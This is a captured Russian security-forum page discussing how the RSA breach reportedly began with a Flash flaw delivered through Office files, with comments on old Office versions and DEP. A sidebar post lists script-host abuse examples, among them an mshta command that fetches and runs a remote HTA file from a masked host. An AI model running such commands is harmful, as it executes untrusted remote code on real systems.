Перейти к содержанию
AM_Bot

Flash-изъян открыл взломщикам путь в сеть RSA

Recommended Posts

AM_Bot

RSA_logo.pngВнутреннее расследование, которое проводит RSA Security по факту мартовского проникновения злоумышленников в ее локальную вычислительную сеть, начинает приносить некоторые плоды, которые можно продемонстрировать публике. Так, компания сообщила, что киберпреступная операция началась с успешной атаки с использованием уязвимости в проигрывателе Flash от Adobe.

Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Valery Ledovskoy
Похоже, что на персональных компьютерах в локальной сети компании использовались устаревшие версии офисных пакетов Microsoft: в наиболее актуальном на данный момент выпуске Office 2010 имеется встроенная защита от подобных атак... Office 2003 и 2007 такими средствами борьбы с угрозами не располагают.

Вообще-то, Office 2007 я бы не назвал ещё устаревшим. Далеко не все пользователи/предприятия перешли даже на эту версию (интерфейс существенно другой, новый формат файлов, другие сложности перехода). Между 2007 и 2010 отличий не так много внешних, поэтому если переход на 2007 состоялся, мотивировать перейти на 2010 сложно. А именно удобство и простота использования офисных пакетов - определяющий фактор их использования, перехода на новые версии и пр. Здесь, скорее, недоработка MS в том, что поддерживаемые (а потому вполне актуальные) версии офисных пакетов подвержены атакам, и пользователей вынуждают переходить на новые версии. Расширенная поддержка MS Office 2003, например, заканчивается только 8 апреля 2014 года: http://support.microsoft.com/lifecycle/?p1=2488 .

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Killer

@мотивировать перейти на 2010 сложно[email protected]

Документооборот? Присылают вам файл docx, а вы говорите "А у нас офис старый!!!"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Feeble
Документооборот? Присылают вам файл docx, а вы говорите "А у нас офис старый!!!"

А мы ставим Пакет обеспечения совместимости Microsoft Office и экономим деньги. Хваленый DEP включаем на всех компьютерах для всех процессов принудительно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Valery Ledovskoy
А мы ставим Пакет обеспечения совместимости Microsoft Office и экономим деньги.

Да-да :)

Хваленый DEP включаем на всех компьютерах для всех процессов принудительно.

Сознательные. Интересно, сколько таких в процентах.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Feeble

Интересно происходит ли распаковка встроенного файла во временный каталог? У "многих" разрешен запуск только определенных расширений с определенных каталогов.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • PR55.RP55
      "времени на раскачку нет"  https://forum.kasperskyclub.ru/index.php?s=35fdc94435f2493d0ac8d0282ba035f4&showtopic=64721 HKLM\...\Run: [1corona.exe] => C:\Windows\System32\1corona.exe [94720 2020-02-14] () [File not signed]
      C:\Windows\System32\1corona.exe
      Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-16] () [File not signed]
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      Startup: C:\Users\Dmitriy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-16] () [File not signed]
      C:\Users\Dmitriy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      Startup: C:\Users\dostyp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-14] () [File not signed]
      C:\Users\dostyp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      2020-02-16 17:22 - 2020-02-16 17:22 - 000094720 _____ C:\Users\Dmitriy\AppData\Roaming\1corona.exe
      C:\Users\Dmitriy\AppData\Roaming\1corona.exe ------------------ А в uVS это была бы одна команда....  " Удалить файл и все родственные файлы" 
    • dompokypok1
      Работаю над проектом интернет-магазина вроде все урезал ужал и жаль что еще можно сделать.
    • dgek2022
      Японская кухня пользуется популярностью по всей России. Традиционная еда из риса и морепродуктов – это прекрасная альтернатива привычному ужину или обеду. Наше кафе японской кухни предлагает удобную услугу – доставка суши, сеты, роллы и других блюд в Томске на дом или в офис. Для больших компаний у нас есть особенные предложения. Зачем куда-то ходить, если можно в любой момент заказать блюда японской кухни. Делая заявку в нашем кафе «Джекина Доставка», вы получаете свежий продукт. Для приготовления используются только натуральные ингредиенты. Особого внимания заслуживает дизайнерская упаковка из экосырья. Эстетичный вид и вкусные японские блюда – все это по доступной цене.
    • dompokypok1
      Периодически у компаний и частных лиц (реже) возникает задача по рейтингованию идей сотрудников или клиентов. Хороший инструмент — параметрические таблицы выбора. Лучшая реализация таблиц выбора на сайте https://choser.ru в choser.ru можно создать неограниченно большие списки/рейтинги идей/рационализаторских предложений/инноваций и за секунды менять приоритеты параметров, фильтры и сортировки для поиска или выбора лучших. Сам практикую использование параметрических таблиц для своих более чем 6400 идей, а так же многократно использовал аналогичный подход для рейтингования/конкурсов на предприятиях. Так что рекомендую  Официальный блог проекта см. https://4choser.ru
    • PR55.RP55
      cscript.exe https://tproger.ru/news/winrm-vbs-windows/ https://vms.drweb.com/virus/?i=8365848&lng=en https://vms.drweb.ru/virus/?i=4154287 O22 - Task: \Microsoft\Windows\Server Manager\CleanupOldPerfLogs - C:\Windows\system32\cscript.exe /B /nologo C:\Windows\system32\calluxxprovider.vbs $(Arg0) $(Arg1) $(Arg2)
      mshta.exe mshta.exe c:\temp.hta
      Mshta.exe http://www.******.com/bar.hta
×